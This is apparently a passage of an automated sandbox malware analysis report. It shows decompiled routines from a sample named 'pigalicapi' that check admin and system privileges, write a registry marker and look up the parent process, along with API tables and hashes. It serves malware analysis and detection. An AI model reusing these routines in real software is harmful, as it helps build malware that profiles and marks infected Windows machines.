                                                                                                                                                                                                                                                                          				char _v9;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				char _v1044;
                                                                                                                                                                                                                                                                          				char _v2068;
                                                                                                                                                                                                                                                                          				long _v2072;
                                                                                                                                                                                                                                                                          				void* _v2076;
                                                                                                                                                                                                                                                                          				void* _v2080;
                                                                                                                                                                                                                                                                          				char _v2084;
                                                                                                                                                                                                                                                                          				int _t43;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v9 = 0;
                                                                                                                                                                                                                                                                          				_v8 = 0x400;
                                                                                                                                                                                                                                                                          				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v16) == 0) {
                                                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                                                          					return _v9;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v2072 = 0;
                                                                                                                                                                                                                                                                          				GetTokenInformation(_v16, 1, 0, 0,  &_v2072); // executed
                                                                                                                                                                                                                                                                          				if(_v2072 >= 0x400) {
                                                                                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                                                                                          					CloseHandle(_v16);
                                                                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v2076 =  &_v1044;
                                                                                                                                                                                                                                                                          				_t43 = GetTokenInformation(_v16, 1, _v2076, _v2072,  &_v2072); // executed
                                                                                                                                                                                                                                                                          				if(_t43 == 0) {
                                                                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v2080 =  &_v2068;
                                                                                                                                                                                                                                                                          				_v2084 = 0x44;
                                                                                                                                                                                                                                                                          				__imp__CreateWellKnownSid(0xc, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                          				if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                          					__imp__CreateWellKnownSid(0x16, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                          					if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                          						__imp__CreateWellKnownSid(0x17, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                          						if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                          							__imp__CreateWellKnownSid(0x18, 0, _v2080,  &_v2084);
                                                                                                                                                                                                                                                                          							if(EqualSid(_v2080,  *_v2076) == 0) {
                                                                                                                                                                                                                                                                          								goto L11;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                          0x040099f9
                                                                                                                                                                                                                                                                          0x040099fd
                                                                                                                                                                                                                                                                          0x04009a19
                                                                                                                                                                                                                                                                          0x04009b80
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009b80
                                                                                                                                                                                                                                                                          0x04009a1f
                                                                                                                                                                                                                                                                          0x04009a3a
                                                                                                                                                                                                                                                                          0x04009a4a
                                                                                                                                                                                                                                                                          0x04009b76
                                                                                                                                                                                                                                                                          0x04009b7a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009b7a
                                                                                                                                                                                                                                                                          0x04009a56
                                                                                                                                                                                                                                                                          0x04009a77
                                                                                                                                                                                                                                                                          0x04009a7f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009a8b
                                                                                                                                                                                                                                                                          0x04009a91
                                                                                                                                                                                                                                                                          0x04009aad
                                                                                                                                                                                                                                                                          0x04009acb
                                                                                                                                                                                                                                                                          0x04009ae6
                                                                                                                                                                                                                                                                          0x04009b04
                                                                                                                                                                                                                                                                          0x04009b1c
                                                                                                                                                                                                                                                                          0x04009b3a
                                                                                                                                                                                                                                                                          0x04009b52
                                                                                                                                                                                                                                                                          0x04009b70
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009b72
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009b3c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009b06
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,?), ref: 04009A0A
                                                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 04009A11
                                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 04009A3A
                                                                                                                                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 04009A77
                                                                                                                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 04009AAD
                                                                                                                                                                                                                                                                          • EqualSid.ADVAPI32(?,00000000), ref: 04009AC3
                                                                                                                                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,00000044), ref: 04009AE6
                                                                                                                                                                                                                                                                          • EqualSid.ADVAPI32(?), ref: 04009AFC
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04009B7A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Token$CreateEqualInformationKnownProcessWell$CloseCurrentHandleOpen
                                                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                                                          • API String ID: 98007406-2746444292
                                                                                                                                                                                                                                                                          • Opcode ID: 9acdad6d6c89bf527d7a7d290df755143e04e7f41d5340071806561b0adaf72d
                                                                                                                                                                                                                                                                          • Instruction ID: 7ae4063a6f13a9051a7762c6ae15c07f15253da6e1139fe1377935b2c4657608
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9acdad6d6c89bf527d7a7d290df755143e04e7f41d5340071806561b0adaf72d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB41F0B5A042189BEB24DF90CC45FDAB3FDFF48700F04C1E4A549A6181DE74AA81DFA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04005A00(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                                                                                          				CHAR* _t35;
                                                                                                                                                                                                                                                                          				int _t39;
                                                                                                                                                                                                                                                                          				long _t43;
                                                                                                                                                                                                                                                                          				CHAR* _t51;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0x10) {
                                                                                                                                                                                                                                                                          					E04007D20(_t27, "Sscculmqcxgnq", 0, 0xe);
                                                                                                                                                                                                                                                                          					lstrcpyA("Sscculmqcxgnq", "WDefault");
                                                                                                                                                                                                                                                                          					_t33 = E04005930(_a4 + 0x45b, "Sscculmqcxgnq", 0xd); // executed
                                                                                                                                                                                                                                                                          					E04007D20(_t33, _a8, 0, _a12);
                                                                                                                                                                                                                                                                          					_t35 =  *0x401189c; // 0x400c4e0
                                                                                                                                                                                                                                                                          					if(lstrlenA(_t35) < _a12) {
                                                                                                                                                                                                                                                                          						_t51 =  *0x401189c; // 0x400c4e0
                                                                                                                                                                                                                                                                          						lstrcpyA(_a8, _t51);
                                                                                                                                                                                                                                                                          						_t39 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                          						if(_t39 + lstrlenA(?str?) < _a12) {
                                                                                                                                                                                                                                                                          							lstrcatA(_a8, "Sscculmqcxgnq");
                                                                                                                                                                                                                                                                          							_v12 = 0x80000001;
                                                                                                                                                                                                                                                                          							_v16 = 0;
                                                                                                                                                                                                                                                                          							_v20 = 0;
                                                                                                                                                                                                                                                                          							_t43 = RegCreateKeyExA(_v12, _a8, 0, 0, 0, 0x20006, 0,  &_v16,  &_v20); // executed
                                                                                                                                                                                                                                                                          							if(_t43 != 0) {
                                                                                                                                                                                                                                                                          								E04007D20(_t43, _a8, 0, _a12);
                                                                                                                                                                                                                                                                          								lstrcpyA(_a8, "software\\microsoft\\windows\\currentversion\\uninstall");
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v8 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                          0x04005a07
                                                                                                                                                                                                                                                                          0x04005a12
                                                                                                                                                                                                                                                                          0x04005a35
                                                                                                                                                                                                                                                                          0x04005a47
                                                                                                                                                                                                                                                                          0x04005a5d
                                                                                                                                                                                                                                                                          0x04005a6f
                                                                                                                                                                                                                                                                          0x04005a77
                                                                                                                                                                                                                                                                          0x04005a86
                                                                                                                                                                                                                                                                          0x04005a8c
                                                                                                                                                                                                                                                                          0x04005a97
                                                                                                                                                                                                                                                                          0x04005aa1
                                                                                                                                                                                                                                                                          0x04005ab9
                                                                                                                                                                                                                                                                          0x04005ac8
                                                                                                                                                                                                                                                                          0x04005ace
                                                                                                                                                                                                                                                                          0x04005ad5
                                                                                                                                                                                                                                                                          0x04005adc
                                                                                                                                                                                                                                                                          0x04005b00
                                                                                                                                                                                                                                                                          0x04005b08
                                                                                                                                                                                                                                                                          0x04005b20
                                                                                                                                                                                                                                                                          0x04005b31
                                                                                                                                                                                                                                                                          0x04005b0a
                                                                                                                                                                                                                                                                          0x04005b0e
                                                                                                                                                                                                                                                                          0x04005b0e
                                                                                                                                                                                                                                                                          0x04005b41
                                                                                                                                                                                                                                                                          0x04005b41
                                                                                                                                                                                                                                                                          0x04005ab9
                                                                                                                                                                                                                                                                          0x04005a86
                                                                                                                                                                                                                                                                          0x04005b4b

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(Sscculmqcxgnq,WDefault), ref: 04005A47
                                                                                                                                                                                                                                                                            • Part of subcall function 04005930: CharUpperA.USER32(00000000), ref: 040059E2
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(0400C4E0), ref: 04005A7D
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,0400C4E0), ref: 04005A97
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005AA1
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Sscculmqcxgnq), ref: 04005AAE
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Sscculmqcxgnq), ref: 04005AC8
                                                                                                                                                                                                                                                                          • RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 04005B00
                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 04005B0E
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,software\microsoft\windows\currentversion\uninstall), ref: 04005B31
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005B3B
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$CharCloseCreateUpperlstrcat
                                                                                                                                                                                                                                                                          • String ID: Sscculmqcxgnq$WDefault$software\microsoft\windows\currentversion\uninstall
                                                                                                                                                                                                                                                                          • API String ID: 4161867159-2182964826
                                                                                                                                                                                                                                                                          • Opcode ID: 6328766250843c22953127ee7e5734f8e2de0c08094b4a1cb46197edb91ced3c
                                                                                                                                                                                                                                                                          • Instruction ID: 2f1465acc8a4d9a659e2af8a658b36752d7f83b1b7b92a7dc582af9786930c23
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6328766250843c22953127ee7e5734f8e2de0c08094b4a1cb46197edb91ced3c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40310775600208FBEB14DFA4DC49FAA37B9EB44708F04C615FA15BB281D7B8AA50CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                                                                                                          			E04001CA0(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				char _v272;
                                                                                                                                                                                                                                                                          				long _v284;
                                                                                                                                                                                                                                                                          				intOrPtr _v300;
                                                                                                                                                                                                                                                                          				void* _v308;
                                                                                                                                                                                                                                                                          				void* _v312;
                                                                                                                                                                                                                                                                          				long _v316;
                                                                                                                                                                                                                                                                          				long _v320;
                                                                                                                                                                                                                                                                          				void* _v324;
                                                                                                                                                                                                                                                                          				char _v328;
                                                                                                                                                                                                                                                                          				int _v332;
                                                                                                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                                                                                                          				int _t47;
                                                                                                                                                                                                                                                                          				void* _t61;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				_t44 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                                                                                                                                          				_v312 = _t44;
                                                                                                                                                                                                                                                                          				if(_v312 == 0xffffffff) {
                                                                                                                                                                                                                                                                          					L18:
                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v308 = 0x128;
                                                                                                                                                                                                                                                                          				_t47 = Process32First(_v312,  &_v308); // executed
                                                                                                                                                                                                                                                                          				if(_t47 == 0) {
                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                          					CloseHandle(_v312);
                                                                                                                                                                                                                                                                          					goto L18;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v320 = GetCurrentProcessId();
                                                                                                                                                                                                                                                                          				_v316 = 0;
                                                                                                                                                                                                                                                                          				while(_v300 != _v320) {
                                                                                                                                                                                                                                                                          					if(Process32Next(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                                                                          					if(_v316 != 0 && Process32First(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                          						while(_v300 != _v316) {
                                                                                                                                                                                                                                                                          							if(Process32Next(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(lstrlenA( &_v272) < _a8) {
                                                                                                                                                                                                                                                                          							lstrcpyA(_a4,  &_v272);
                                                                                                                                                                                                                                                                          							_v324 = OpenProcess(0x410, 0, _v316);
                                                                                                                                                                                                                                                                          							if(_v324 != 0) {
                                                                                                                                                                                                                                                                          								_v332 = 0;
                                                                                                                                                                                                                                                                          								_push( &_v332);
                                                                                                                                                                                                                                                                          								_push(4);
                                                                                                                                                                                                                                                                          								_push( &_v328);
                                                                                                                                                                                                                                                                          								_t61 = _v324;
                                                                                                                                                                                                                                                                          								_push(_t61); // executed
                                                                                                                                                                                                                                                                          								L0400B1D4(); // executed
                                                                                                                                                                                                                                                                          								if(_t61 == 0) {
                                                                                                                                                                                                                                                                          									_push(_a8);
                                                                                                                                                                                                                                                                          									_push(_a4);
                                                                                                                                                                                                                                                                          									_push(_v324); // executed
                                                                                                                                                                                                                                                                          									L0400B1C8(); // executed
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_push(_a8);
                                                                                                                                                                                                                                                                          									_push(_a4);
                                                                                                                                                                                                                                                                          									_push(_v328);
                                                                                                                                                                                                                                                                          									_push(_v324);
                                                                                                                                                                                                                                                                          									L0400B1CE();
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v5 = 1;
                                                                                                                                                                                                                                                                          								FindCloseChangeNotification(_v324); // executed
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v316 = _v284;
                                                                                                                                                                                                                                                                          				goto L6;
                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                          0x04001ca9
                                                                                                                                                                                                                                                                          0x04001cb1
                                                                                                                                                                                                                                                                          0x04001cb6
                                                                                                                                                                                                                                                                          0x04001cc3
                                                                                                                                                                                                                                                                          0x04001e51
                                                                                                                                                                                                                                                                          0x04001e57
                                                                                                                                                                                                                                                                          0x04001e57
                                                                                                                                                                                                                                                                          0x04001cc9
                                                                                                                                                                                                                                                                          0x04001ce1
                                                                                                                                                                                                                                                                          0x04001ce8
                                                                                                                                                                                                                                                                          0x04001e44
                                                                                                                                                                                                                                                                          0x04001e4b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001e4b
                                                                                                                                                                                                                                                                          0x04001cf4
                                                                                                                                                                                                                                                                          0x04001cfa
                                                                                                                                                                                                                                                                          0x04001d04
                                                                                                                                                                                                                                                                          0x04001d35
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001d37
                                                                                                                                                                                                                                                                          0x04001d3e
                                                                                                                                                                                                                                                                          0x04001d5f
                                                                                                                                                                                                                                                                          0x04001e3e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001e3e
                                                                                                                                                                                                                                                                          0x04001d81
                                                                                                                                                                                                                                                                          0x04001d92
                                                                                                                                                                                                                                                                          0x04001dac
                                                                                                                                                                                                                                                                          0x04001db9
                                                                                                                                                                                                                                                                          0x04001dbb
                                                                                                                                                                                                                                                                          0x04001dcb
                                                                                                                                                                                                                                                                          0x04001dcc
                                                                                                                                                                                                                                                                          0x04001dd4
                                                                                                                                                                                                                                                                          0x04001dd5
                                                                                                                                                                                                                                                                          0x04001ddb
                                                                                                                                                                                                                                                                          0x04001ddc
                                                                                                                                                                                                                                                                          0x04001de3
                                                                                                                                                                                                                                                                          0x04001e05
                                                                                                                                                                                                                                                                          0x04001e09
                                                                                                                                                                                                                                                                          0x04001e10
                                                                                                                                                                                                                                                                          0x04001e11
                                                                                                                                                                                                                                                                          0x04001de5
                                                                                                                                                                                                                                                                          0x04001de8
                                                                                                                                                                                                                                                                          0x04001dec
                                                                                                                                                                                                                                                                          0x04001df3
                                                                                                                                                                                                                                                                          0x04001dfa
                                                                                                                                                                                                                                                                          0x04001dfb
                                                                                                                                                                                                                                                                          0x04001dfb
                                                                                                                                                                                                                                                                          0x04001e16
                                                                                                                                                                                                                                                                          0x04001e21
                                                                                                                                                                                                                                                                          0x04001e21
                                                                                                                                                                                                                                                                          0x04001db9
                                                                                                                                                                                                                                                                          0x04001e27
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001d3e
                                                                                                                                                                                                                                                                          0x04001d18
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04001CB1
                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(000000FF,00000128), ref: 04001CE1
                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 04001CEE
                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32 ref: 04001D2E
                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(000000FF,00000128), ref: 04001D52
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 04001D78
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-00000204,?), ref: 04001D92
                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 04001DA6
                                                                                                                                                                                                                                                                          • EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 04001DDC
                                                                                                                                                                                                                                                                          • GetModuleFileNameExA.PSAPI(00000000,?,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001DFB
                                                                                                                                                                                                                                                                          • GetProcessImageFileNameA.PSAPI(00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E11
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E21
                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32 ref: 04001E37
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 04001E4B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ProcessProcess32$CloseFileFirstNameNext$ChangeCreateCurrentEnumFindHandleImageModuleModulesNotificationOpenSnapshotToolhelp32lstrcpylstrlen
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 384183238-0
                                                                                                                                                                                                                                                                          • Opcode ID: f968c283a4d19645c33466bb1cdde0a0755c48e1b5ee604f6c84b8f5c7af64fd
                                                                                                                                                                                                                                                                          • Instruction ID: c9fd9719e36fb5edb768dae97ebace1d15885c7ece39cbb3db7519296d7591e9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f968c283a4d19645c33466bb1cdde0a0755c48e1b5ee604f6c84b8f5c7af64fd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9641DC719002189BEB65DF94CD84BEDB7B9AB48304F0086D8E60DB6180DB75BE84CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04005F30() {
                                                                                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                                                                                          				signed int _v9;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				char _v284;
                                                                                                                                                                                                                                                                          				int _v288;
                                                                                                                                                                                                                                                                          				int _v292;
                                                                                                                                                                                                                                                                          				char _v324;
                                                                                                                                                                                                                                                                          				int _v328;
                                                                                                                                                                                                                                                                          				char* _t27;
                                                                                                                                                                                                                                                                          				CHAR* _t30;
                                                                                                                                                                                                                                                                          				long _t33;
                                                                                                                                                                                                                                                                          				long _t37;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v9 = 0;
                                                                                                                                                                                                                                                                          				_t27 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          				_v8 = _t27;
                                                                                                                                                                                                                                                                          				E04007D20(_t27,  &_v284, 0, 0x104);
                                                                                                                                                                                                                                                                          				lstrcpyA( &_v284, "pigalicapi");
                                                                                                                                                                                                                                                                          				_t30 =  *0x4011898; // 0x4013fe2
                                                                                                                                                                                                                                                                          				lstrcatA( &_v284, _t30);
                                                                                                                                                                                                                                                                          				_v16 = 0x80000001;
                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          					_v16 = 0x80000002;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                          				_t33 = RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20); // executed
                                                                                                                                                                                                                                                                          				if(_t33 == 0) {
                                                                                                                                                                                                                                                                          					_v292 = 0x20;
                                                                                                                                                                                                                                                                          					_v288 = 0x20;
                                                                                                                                                                                                                                                                          					_t37 = RegQueryValueExA(_v20,  &_v284, 0, 0,  &_v324,  &_v288); // executed
                                                                                                                                                                                                                                                                          					if(_t37 == 0) {
                                                                                                                                                                                                                                                                          						_v9 = 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t47 = _v9 & 0x000000ff;
                                                                                                                                                                                                                                                                          					if((_v9 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						_v328 = 0x10;
                                                                                                                                                                                                                                                                          						E04009BD0(_t47,  &_v324, 0x10);
                                                                                                                                                                                                                                                                          						RegSetValueExA(_v20,  &_v284, 0, 3,  &_v324, 0x10);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					RegCloseKey(_v20);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v9;
                                                                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                                                                          0x04005f39
                                                                                                                                                                                                                                                                          0x04005f3d
                                                                                                                                                                                                                                                                          0x04005f42
                                                                                                                                                                                                                                                                          0x04005f53
                                                                                                                                                                                                                                                                          0x04005f67
                                                                                                                                                                                                                                                                          0x04005f6d
                                                                                                                                                                                                                                                                          0x04005f7a
                                                                                                                                                                                                                                                                          0x04005f80
                                                                                                                                                                                                                                                                          0x04005f90
                                                                                                                                                                                                                                                                          0x04005f92
                                                                                                                                                                                                                                                                          0x04005f92
                                                                                                                                                                                                                                                                          0x04005f99
                                                                                                                                                                                                                                                                          0x04005fb3
                                                                                                                                                                                                                                                                          0x04005fbb
                                                                                                                                                                                                                                                                          0x04005fc1
                                                                                                                                                                                                                                                                          0x04005fcb
                                                                                                                                                                                                                                                                          0x04005ff2
                                                                                                                                                                                                                                                                          0x04005ffa
                                                                                                                                                                                                                                                                          0x04005ffc
                                                                                                                                                                                                                                                                          0x04005ffc
                                                                                                                                                                                                                                                                          0x04006000
                                                                                                                                                                                                                                                                          0x04006006
                                                                                                                                                                                                                                                                          0x04006008
                                                                                                                                                                                                                                                                          0x0400601b
                                                                                                                                                                                                                                                                          0x0400603b
                                                                                                                                                                                                                                                                          0x0400603b
                                                                                                                                                                                                                                                                          0x04006045
                                                                                                                                                                                                                                                                          0x04006045
                                                                                                                                                                                                                                                                          0x04006051

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,pigalicapi), ref: 04005F67
